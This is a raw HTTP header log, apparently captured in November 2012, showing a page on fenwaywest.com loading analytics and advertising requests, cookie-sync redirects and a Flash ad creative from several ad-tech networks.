Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:43 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353202242915|535461..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|535039..0.0.1353202242915|543604..0.0.1353202242915|530739..0.0.1353202242915|537583..0.0.1353202242915|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:43 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /__utm.gif?utmwv=5.3.8&utms=1&utmn=1719105715&utmhn=fenwaywest.com&utmt=event&utme=5(Loaded%20with%20URL%20-%20JS*1061_p*http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php)&utmcs=UTF-8&utmsr=1176x885&utmvp=283x133&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&utmhid=1869096954&utmr=http%3A%2F%2Fwww.shinynylonarts.com%2F&utmp=%2Fmedia%2Findex.php&utmac=UA-2526960-16&utmcc=__utma%3D54302783.284014554.1353202243.1353202243.1353202243.1%3B%2B__utmz%3D54302783.1353202243.1.1.utmcsr%3Dshinynylonarts.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&utmu=wAAgAAAAAC~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.8&amp;utms=1&amp;utmn=1719105715&amp;utmhn=fenwaywest.com&amp;utmt=event&amp;utme=5(Loaded%20with%20URL%20-%20JS*1061_p*http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php)&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=283x133&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;utmhid=1869096954&amp;utmr=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;utmp=%2Fmedia%2Findex.php&amp;utmac=UA-2526960-16&amp;utmcc=__utma%3D54302783.284014554.1353202243.1353202243.1353202243.1%3B%2B__utmz%3D54302783.1353202243.1.1.utmcsr%3Dshinynylonarts.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&amp;utmu=wAAgAAAAAC~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 11:58:06 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 135157
Server: GFE/2.0
GET /uploaded_creatives/39e4e6a79f69632c77c5dbdfed52718c2e667745.swf?clickTAG=http%3A%2F%2Feeu.pixel.prod2.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26b%3Drh176.ovq.wiz.cebq2%26message%3DeJwNzDEKAzEMBdG7_NoGWZZkWV2yZi.TxamWFCF3j9oHM180BNTo5EnPerJTlYNXffBc9ei.BjHbNEOBIlSlFwwEuzcuYMQoMEQTc0noKc2V3NN7vu_92u_PzlwQ.76u5HQfzu33B6bpG90-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DtG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url%253Dhttp%25253A%25252F%25252Fwww.porsgrundbad.no%25252Fsmart%25253Futm_source%25253DNB-AdExchange%252526utm_medium%25253Dcpm%252526utm_content%25253Dnorja%252526utm_campaign%25253DNB-smart HTTP/1.1

Host: cdn.invitemedia.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4577&amp;creative_id=371685&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&amp;exch_id=7&amp;line_item_id=1850887&amp;b=rh176.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=560F290B-F280-4C2D-A29D-C38D70226966&amp;us_id=5543&amp;invite_uid=3f62d100-dd98-4006-b187-452598b27a1b&amp;pub_line_item_id=87821&amp;mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;inv_size_id=146842&amp;campaign_id=252144&amp;p_us_id=28812
HTTP/1.0 200 OK

Content-Type: application/x-shockwave-flash
Content-Length: 37696
Connection: keep-alive
x-amz-id-2: Ppot6RswbCV7gYYeN4BLop8bIblu4ob3Gf+aL/QA+VBjy2FZFtZ0WlU3tmnKHFwj
x-amz-request-id: 408A2EA081F71270
Date: Wed, 17 Oct 2012 13:27:20 GMT
Last-Modified: Wed, 17 Oct 2012 13:24:45 GMT
Etag: &quot;9f2f64c5eede5090336e4911e38fcca9&quot;
Accept-Ranges: bytes
Server: AmazonS3
Age: 22494
X-Amz-Cf-Id: yG91P4W00GH4-WQ_xbwMaENS8aYN0Mr6TJZZzZumB0Ri9tZ9ROO8hw==
Via: 1.0 9d20a7bb63aef532ab86d12af354967a.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /data_sync?partner_id=230&exchange_id=8 HTTP/1.1

Host: pixel.invitemedia.com
GET /data_sync?partner_id=230&amp;exchange_id=8 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4577&amp;creative_id=371685&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&amp;exch_id=7&amp;line_item_id=1850887&amp;b=rh176.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=560F290B-F280-4C2D-A29D-C38D70226966&amp;us_id=5543&amp;invite_uid=3f62d100-dd98-4006-b187-452598b27a1b&amp;pub_line_item_id=87821&amp;mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;inv_size_id=146842&amp;campaign_id=252144&amp;p_us_id=28812
Cookie: uid=f45883da-a5b2-4229-92e5-ccb518d47872; dp_rec=&quot;{\&quot;4\&quot;:1353202240}&quot;; camp_freq_p1=&quot;eJzjkuH4sJFfgFHiwJcFrawKjBoHpi9rZTVgtADzAZ0HCv0=&quot;; exchange_uid=eyI3IjpbIjc1NzdDNERBLTM5OTUtNDE1My05QTBCLTdDOTkyN0JGMTAxMyIsNzM0ODI1XSwiNCI6WyJDQUVTRUU1Q2Q0Umh0eUxPeDV6YXVlanVMVU0iLDczNDgyNV19; impressions_p1=&quot;eJzjcuRgF1IxMHR2tTQxMNc1MTU11TUxsDTUtTSzMNF1MTI0N3Q2c3R0MrSUOPBlQSurwtEvRRozfnMY9K5jtViuHdHzkBEAClwTeA==&quot;; io_freq_p1=&quot;eJzjkuF4eYtRgFHiwJcFrawKjBoHpi9rZTVgtADzAZ8WCxE=&quot;; partnerUID=&quot;eyI4NCI6WyI1RldPd3k5OTk5ZTIxdkN4Iix0cnVlXX0=&quot;
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:43 GMT
Set-Cookie: dp_rec=&quot;{\&quot;6\&quot;:1353202243+\&quot;4\&quot;:1353202240}&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:43 GMT;Max-Age=31536000 impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Content-Length: 519
Connection: close
Server: Jetty(7.3.1.v20110307)
GET ///www/delivery/ajs.php?zoneid=95032&username=bloguin&numAds=1&premium=1&eleid=lijit_region_95032&abf=true&tid=95032_13532022430215598551eed27&lijit_kw=&cb=59074969834&flv=10.0.45&time=02:30:43&ifr=1&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&od=fenwaywest.com&referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: apr.lijit.com
GET ///www/delivery/ajs.php?zoneid=95032&amp;username=bloguin&amp;numAds=1&amp;premium=1&amp;eleid=lijit_region_95032&amp;abf=true&amp;tid=95032_13532022430215598551eed27&amp;lijit_kw=&amp;cb=59074969834&amp;flv=10.0.45&amp;time=02:30:43&amp;ifr=1&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;od=fenwaywest.com&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=UTF-8
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; expires=Mon, 18-Nov-2013 01:30:43 GMT; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1215
Connection: close
GET /pubm_imp?returnType=image&key=AdImp&cost=457700&creativeID=371685&message=eJwNzDEKAzEMBdG7_NoGWZZkWV2yZi.TxamWFCF3j9oHM180BNTo5EnPerJTlYNXffBc9ei.BjHbNEOBIlSlFwwEuzcuYMQoMEQTc0noKc2V3NN7vu_92u_PzlwQ.76u5HQfzu33B6bpG90-&managed=false&b=rh176.ovq.wiz.cebq2 HTTP/1.1

Host: eeu.pixel.prod2.invitemedia.com
GET /pubm_imp?returnType=image&amp;key=AdImp&amp;cost=457700&amp;creativeID=371685&amp;message=eJwNzDEKAzEMBdG7_NoGWZZkWV2yZi.TxamWFCF3j9oHM180BNTo5EnPerJTlYNXffBc9ei.BjHbNEOBIlSlFwwEuzcuYMQoMEQTc0noKc2V3NN7vu_92u_PzlwQ.76u5HQfzu33B6bpG90-&amp;managed=false&amp;b=rh176.ovq.wiz.cebq2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4577&amp;creative_id=371685&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&amp;exch_id=7&amp;line_item_id=1850887&amp;b=rh176.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=560F290B-F280-4C2D-A29D-C38D70226966&amp;us_id=5543&amp;invite_uid=3f62d100-dd98-4006-b187-452598b27a1b&amp;pub_line_item_id=87821&amp;mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;inv_size_id=146842&amp;campaign_id=252144&amp;p_us_id=28812
Cookie: uid=f45883da-a5b2-4229-92e5-ccb518d47872; dp_rec=&quot;{\&quot;4\&quot;:1353202240}&quot;; camp_freq_p1=&quot;eJzjkuH4sJFfgFHiwJcFrawKjBoHpi9rZTVgtADzAZ0HCv0=&quot;; exchange_uid=eyI3IjpbIjc1NzdDNERBLTM5OTUtNDE1My05QTBCLTdDOTkyN0JGMTAxMyIsNzM0ODI1XSwiNCI6WyJDQUVTRUU1Q2Q0Umh0eUxPeDV6YXVlanVMVU0iLDczNDgyNV19; impressions_p1=&quot;eJzjcuRgF1IxMHR2tTQxMNc1MTU11TUxsDTUtTSzMNF1MTI0N3Q2c3R0MrSUOPBlQSurwtEvRRozfnMY9K5jtViuHdHzkBEAClwTeA==&quot;; io_freq_p1=&quot;eJzjkuF4eYtRgFHiwJcFrawKjBoHpi9rZTVgtADzAZ8WCxE=&quot;; partnerUID=&quot;eyI4NCI6WyI1RldPd3k5OTk5ZTIxdkN4Iix0cnVlXX0=&quot;
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:43 GMT
Set-Cookie: camp_freq_p1=&quot;eJzjkuH4sJFfgEni8JcFrawKTBoHpi9rZTVgsjgA4gMAnXMLAw==&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:43 GMT;Max-Age=31536000 impressions_p1=&quot;eJzjcuRgF1IxMHR2tTQxMNc1MTU11TUxsDTUtTSzMNF1MTI0N3Q2c3R0MrSUOPBlQSurwtEvRRozfnMY9K5jtViuHdHzkJELbISpmYGbkaWBk66bkYWBromzkYuuo5Gli66zsYWLuYGRkZmlmZnEYbAR7X8KNGahGAEAMeQm4A==&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:43 GMT;Max-Age=31536000 io_freq_p1=&quot;eJzjkuF4eYtRgEni8JcFrawKTBoHpi9rZTVgsjgA4gMAn4ILFw==&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:43 GMT;Max-Age=31536000 impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Content-Length: 43
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D HTTP/1.1

Host: sync.mathtag.com
GET /sync/img?mt_exid=11&amp;type=sync&amp;redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: uuid=50a83a3f-824c-494c-a6c1-8d21845c8673
HTTP/1.1 302 Found

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:43 GMT
Content-Length: 0
Connection: keep-alive
Server: mt2/2.6.2.2465 Sep 24 2012 22:21:34 zrh-pixel-x5 pid 0x1083 4227
Cache-Control: no-cache
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: mt_mop=11:1353202243; domain=.mathtag.com; path=/; expires=Tue, 18-Dec-2012 01:30:43 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=530739&amp;ev=50a83a3f-824c-494c-a6c1-8d21845c8673
GET /adserver/ako?rsi_random=281784345&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=A7798C53EBE3A118D71E950376C2B010&rsi_width=160&rsi_height=600&rsi_secure=0&rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_title=&rsi_inf=1 HTTP/1.1

Host: ads.revsci.net
GET /adserver/ako?rsi_random=281784345&amp;rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&amp;rsi_site=A7798C53EBE3A118D71E950376C2B010&amp;rsi_width=160&amp;rsi_height=600&amp;rsi_secure=0&amp;rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;rsi_title=&amp;rsi_inf=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref=&quot;http://js.revsci.net/w3c/rsip3p.xml&quot;, CP=&quot;NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA&quot;
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsiPus_AAAA=&quot;MLuBMx7UQh8FEhABFBNH3FQTABMURRE4k97FBwWUExVaF0JXdF3cx8oFxppt8AlAFw9vawljazo=&quot;; Version=1; Domain=.revsci.net; Max-Age=63072000; Path=/
Location: http://adnxs.revsci.net/imp?Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1916686269&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:42 GMT
GET /imp?Z=160x600&s=653070&r=0&_salt=1916686269&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: adnxs.revsci.net
GET /imp?Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1916686269&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: rsiPus_AAAA=&quot;MLuBMx7UQh8FEhABFBNH3FQTABMURRE4k97FBwWUExVaF0JXdF3cx8oFxppt8AlAFw9vawljazo=&quot;
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Date: Sun, 18 Nov 2012 01:30:43 GMT
Content-Length: 717
GET /bh/rtset?do=add&pid=530739&ev=50a83a3f-824c-494c-a6c1-8d21845c8673 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=530739&amp;ev=50a83a3f-824c-494c-a6c1-8d21845c8673 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=1; wf=0; pb_rtb_ev=2-530731..0.0.1353202242915|535461..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|535039..0.0.1353202242915|543604..0.0.1353202242915|530739..0.0.1353202242915|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-98-219-7
Date: Sun, 18 Nov 2012 01:30:43 GMT
Expires: -1
